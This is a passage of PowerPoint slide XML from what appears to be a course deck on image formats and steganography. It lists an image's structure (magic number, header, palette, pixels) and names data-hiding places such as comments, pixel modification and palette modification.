              <a:t>one  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-139" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>more values </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" i="1" spc="-133" baseline="-10416" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>i  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-525" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>=         </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-476" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" i="1" spc="44" baseline="-10416" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>i </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="-159" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" i="1" spc="-238" baseline="-10416" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>i </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" i="1" spc="-73" baseline="-10416" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>i </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="159" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>}.</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1716353" y="2366070"/>
            <a:ext cx="5707418" cy="1909571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360870" y="4693619"/>
            <a:ext cx="4024199" cy="1804472"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2030730" h="910589">
                <a:moveTo>
                  <a:pt x="0" y="910330"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2030415" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2030415" y="910330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="910330"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="1E536D"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="5400428"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="5816640"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="6232852"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360870" y="4693619"/>
            <a:ext cx="4024199" cy="1667691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="49076" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="386"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3809115" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Format	</a:t>
            </a:r>
            <a:endParaRPr sz="2378">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="762578" marR="1021804">
              <a:lnSpc>
                <a:spcPct val="125299"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="436"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Magic </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Number  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Header </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="238" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(+ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Palette)  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Pixels</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4755400" y="4693619"/>
            <a:ext cx="4024199" cy="1804472"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2030729" h="910589">
                <a:moveTo>
                  <a:pt x="0" y="910330"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2030415" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2030415" y="910330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="910330"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="1E536D"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5320252" y="5400428"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5320252" y="5816640"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5320252" y="6232852"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4755400" y="4693619"/>
            <a:ext cx="4024199" cy="1677373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="49076" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="386"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3809115" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Hiding	</a:t>
            </a:r>
            <a:endParaRPr sz="2378">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="762578">
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Comments</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="762578" marR="931201">
              <a:lnSpc>
                <a:spcPct val="125299"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Pixels </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>modification  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Palette</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>modification</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165070" y="12638854"/>
            <a:ext cx="5798470" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>ESIEA </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Laval </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="99" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t>Bodin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8033591" y="6621582"/>
            <a:ext cx="557448" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1189" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>16 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>49</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3004177705"/>
      </p:ext>
    </p:ext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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="116242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0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" spc="-5" dirty="0"/>
              <a:t>DAY 1</a:t>
            </a:r>
            <a:endParaRPr sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
